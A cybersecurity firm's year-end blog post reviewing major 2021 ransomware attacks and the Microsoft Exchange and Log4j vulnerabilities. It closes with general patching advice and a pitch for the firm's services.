This year is on its way out, but before we say goodbye, let’s take stock of the major 2021 cybersecurity events. As we’ll see, the major attacks used ransomware, attackers demanded millions of dollars in exchange for decryption tools, and attacked companies usually paid up. And while 2 out of 3 of Americans are “very concerned” about hackers, by October there were already more data breaches for 2021 than there were in all of 2020. 2021 is poised to set a single-year record for these transgressions.
While we could point to many different cyber attacks from 2021, here are five that stand out:
Insurance giant CNA Financial Corp. suffered a major ransomware attack in March. It paid the hackers a handsome sum of $40 million, after the cybercriminals spent two weeks stealing their data. Reports show that the hacking group used a malware program called Phoenix Locker, which has roots in a Russian cybercrime syndicate.
Government officials were not happy with the major payout. They argued that negotiating and paying off these hackers only encourages the behavior. CNA contends that it complied with all relevant laws in the wake of the attacks.
In May the cybercrime group DarkSide attacked the oil giant Colonial Pipeline with ransomware. This breach was thanks to a stolen password, obtained because CP’s VPN did not require multi-factor authentication. The attack led to a shutdown in operations, affecting fuel supplies across the United States.
CP paid approximately $5 million (or 75 bitcoin) in ransom to DarkSide. DarkSide ransomed troves of CP data as leverage to get the money.
As with the CNA attack, the FBI was unhappy with the payout to the hackers. Eventually, the U.S. government recovered about $2.3 million, in the form of bitcoin.
DarkSide struck again in May when they attacked the German chemical distributor Brenntag with ransomware. According to the cybercriminals, they stole 150 GB of data and threatened to leak it to the public. Data included Social Security numbers, birthdates, and driver’s license numbers. Brenntag then paid DarkSide $4.4 million in exchange for a decryption tool to recover the lost data, none of which was used in a fraudulent way.
Then in early June the meatpacking giant JBS USA halted North American and Australian operations after a ransomware attack. JBS stopped all cattle slaughtering after the cybercriminals threatened to undermine food supply chains and further raise the price of meat. The FBI identified the threat group to be “REvil” or “Sodinokibi.”
To stop the attacks, JBS paid $11 million to the crime syndicate, allowing the company to return to full operations fairly quickly. There is no report that the government was able to recover any of the ransom payments.
Just a few weeks later, REvil struck again. This time it was U.S.-based Kaseya, “holding more than 1,000 companies ransom.” The group went through a Virtual Storage Appliance (VSA) server in Kaseya’s network, compromising and encrypting thousands of nodes.
REvil demanded $50 million, but Kaseya refused to pay the ransom. According to the company, it was able to secure a “100% effective” decryption tool without paying the ransom, allowing it to recover all lost customer data.
Businesses of all sizes need to be aware of where they may be vulnerable to bad actors. Here are three examples from 2021 to illustrate:
The Microsoft Exchange attack (the Hafnium attack) in the early months of 2021 raised concerns about vulnerabilities for any business that uses Microsoft Exchange for email. The attacks were widespread, negatively affecting 30,000 organizations, including small businesses. In each instance, hackers left “password-protected hacking tools,” enabling attackers to access and exploit victims’ computer servers.
Microsoft has encouraged users to be proactive in response to these vulnerabilities. In particular, it’s important to perform investigations and implement detections to discern whether there are prior or future problems on the horizon.
In September 2021, Microsoft Exchange servers were attacked again, thanks to vulnerabilities in the Proxyshell. Microsoft has created a patch to fix the vulnerability, but it’s not clear if it will be sufficient.
However, there is a way to fix this vulnerability. Some best practices include keeping servers up to date, installing the latest Cumulative Update when creating a new server, and backing up any and all customizations. You’ll also need to install an Exchange CU using the Setup Wizard.
Log4j is a Java library that’s used to record security and performance data for consumer and business enterprises. The Apache Log4j vulnerability “allows threat actors to execute code remotely on a targeted computer.” The vulnerable versions of Log4j is the software library, known as “Log4Shell” and “Logjam.”
There are ways to protect against this vulnerability. Top tips include the prioritization of patching, applying software updates the minute they’re available, and installing a web application firewall “with rules that automatically update so that your SOC is able to concentrate on fewer alerts.”
While 2021 is soon to be in the past, it’s wishful thinking to think 2022 won’t see more of the same. Experts predict that ransomware costs will exceed $265 billion by 2031 and that ransomware attacks will occur every 2 seconds going forward. While big companies made the headlines, many small and medium-sized businesses dealt with attacks as well, ranging from business email compromise, to wire fraud, to ransomware. In fact, they have the information cybercriminals want, and they often lack the security infrastructure to fight the attacks. According to reports, 43% of cyber attacks target small businesses.
Vigilance, education, and protection are therefore paramount for businesses of all sizes. If you want to have peace of mind as you face 2022, lean on Blue Team Alpha to provide that for you. Contact us today to learn more about our cybersecurity services.